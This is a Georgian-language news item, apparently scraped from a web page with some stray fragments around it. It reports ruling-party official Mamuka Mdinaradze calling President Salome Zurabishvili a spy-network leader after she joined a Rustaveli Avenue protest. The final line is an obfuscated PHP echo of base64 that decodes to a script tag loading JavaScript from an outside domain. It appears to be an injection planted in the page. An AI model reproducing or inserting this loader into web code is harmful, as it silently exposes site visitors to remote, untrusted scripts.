celsiusi
ავერსი საქკაბელი

სალომე ზურაბიშვილი] გადამგდები ჯაშუშური ქსელის ერთ-ერთი ლიდერია, რომელიც იმ კამპანიის ნაწილია, რასაც ეროვნულის გარუსების კამპანია, ამ ქვეყანაში აგენტურის დასმის მცდელობა ჰქვია, - ამის შესახებ „ქართული ოცნების“ აღმასრულებელმა მდივანმა, საპარლამენტო უმრავლესობის ლიდერმა, მამუკა მდინარაძემ საქართველოს პრეზიდენტ სალომე ზურაბიშვილზე საუბრისას განაცხადა.

მისივე თქმით, „საქართველოს ე.წ. პრეზიდენტი, სალომე ზურაბიშვილი, რომელიც მიდის ქართველ პოლიციელთან და რუსს ეძახის, ის არც პრეზიდენტია და არც ქართველი.

„გენეტიკური კუთვნილება და ეთნიკური კუთვნილება არ ნიშნავს ქართველობას. შესაძლოა, ათასჯერ მეტი ეთნიკურად არაქართველი იყოს, რომელიც ქართველ პოლიციას რუსს არ კადრებს. ეროვნული საქმის გამკეთებელს რუსს არ ეძახის. ეს ადამიანი ჩართულია კამპანიაში, რომ ყველაფერი ეროვნული რუსულია, ყველაფერი ქართული რუსულია. ამის ავტორს სხვანაირად ვერ დავახასიათებ. ეს არის ჯაშუშური ქსელის ერთ-ერთი ლიდერი, რომელიც ჩვენი ხელით არის არჩეული, ჩვენი ხვეწნით არის არჩეული. ალბათ, ერთი ადამიანი არ მისცემდა ხმას საქართველოში თავისი დაქალების გარდა, რომ არა ბიძინა ივანიშვილიდან დაწყებული ჩვენი გუნდის წევრები ბილბორდები ქუჩებში.

ეს არის გადამგდები ჯაშუშური ქსელის ერთ-ერთი ლიდერი, რომელიც იმ კამპანიის ნაწილი, რასაც ეროვნულის გარუსების კამპანია ჰქვია, ამ ქვეყანაში აგენტურის დასმის მცდელობა ჰქვია“, - აღნიშნა მდინარაძემ.

ცნობისთვის, გუშინ, საქართველოს პრეზიდენტი სალომე ზურაბიშვილი რუსთაველის გამზირზე საპროტესტო აქციას შეუერთდა. პრეზიდენტმა აღნიშნული გადაწყვეტილება მას შემდეგ მიიღო, რაც მოქალაქეებმა მისი აქციაზე, ხალხის გვერდით დგომა მოითხოვეს. საქართველოს პრეზიდენტმა სალომე ზურაბიშვილმა რუსთაველის გამზირზე საპროტესტო აქციაზე მისვლისას სპეციალური დანიშნულების რაზმს მიმართა: „თქვენი მოვალეობაა, დაიცავთ სახელმწიფოებრიობა, მოქალაქეები - რუსეთს ემსახურებით თუ საქართველოს, ფიცი ვის წინაშე დადეთ?!“

58
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");